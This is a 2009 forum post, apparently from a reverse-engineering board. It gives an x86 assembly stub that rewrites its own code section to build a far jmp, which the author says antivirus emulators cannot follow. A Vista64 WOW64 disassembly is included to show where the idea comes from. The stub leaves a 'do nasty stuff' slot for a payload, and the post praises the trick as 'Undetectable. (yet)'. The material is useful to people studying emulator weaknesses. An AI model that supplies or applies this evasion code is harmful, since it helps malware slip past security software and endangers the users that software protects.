Log in

View Full Version : AV Emulators not able to handle far jmp, yet.

int0
February 2nd, 2009, 16:13
So here is another bug in AV emulators I have tested code this on most AV emulators and no one was able to handle it properly.
Code:


		jmp get_jump_address

go_back:

		mov eax, [esp]

		

		xor ecx, ecx

		mov cl, 8                   ; skip far jmp and ret

		

		add ecx, eax

		mov byte ptr [eax], 0EAh    ; write far jmp

		inc eax

		

		mov dword ptr [eax], ecx    ; write address

		add eax, 4					

		mov cx, cs

		mov word ptr[eax], cx       ; write code segment

		ret

get_jump_address:

		call go_back

		db 90h                      ; 0EAh - jmp

		dd 90909090h                ; address	

		dw 9090h					; segment

                                    ; AV emulators will skip this far jmp or 

                                    ; not able to handle it at all

		ret

continue_here:

                                    ; do nasty stuff

		xor eax, eax

		ret

This idea I borrowed from WOW64

How it looks like in Vista64:
Code:


cs = 0023

7EFA008B    FF15 0020FA7E        call near dword ptr [7EFA2000] = 75ED31B0

75ED31B0    EA 3736ED75 3300     jmp far 0033:75ED3637          ; continue in wow64cpu.dll



.text:0000000078BC3637                 mov     r8d, [esp+0]

.text:0000000078BC363C                 mov     [r13+0BCh], r8d

.text:0000000078BC3643                 add     esp, 4

.text:0000000078BC3646                 mov     [r13+0C8h], esp

.text:0000000078BC364D                 mov     rsp, r14

.text:0000000078BC3650                 and     qword ptr [r12+1480h], 0

.text:0000000078BC3659                 mov     r11d, edx

.text:0000000078BC3659 sub_78BC3637    endp ; sp-analysis failed

.text:0000000078BC3659

.text:0000000078BC365C ; Exported entry  25. TurboDispatchJumpAddressStart

.text:0000000078BC365C

.text:0000000078BC365C ; =============== S U B R O U T I N E =======================================

.text:0000000078BC365C

.text:0000000078BC365C

.text:0000000078BC365C                 public TurboDispatchJumpAddressStart

.text:0000000078BC365C TurboDispatchJumpAddressStart proc near ; DATA XREF: CpuProcessInit+156o

.text:0000000078BC365C                                         ; CpuProcessInit+169o ...

.text:0000000078BC365C                 jmp     qword ptr [r15+rcx*8]

.text:0000000078BC365C TurboDispatchJumpAddressStart endp


Conclusion:
[+] Small and generic code.
[+] Undetectable. (yet)
[-] Write access rights for code section.
[-] Can be fixed very soon.

Correction:
It seems this trick works only on x64 systems and looks like AV emulators behave in different way on x86/x64 systems.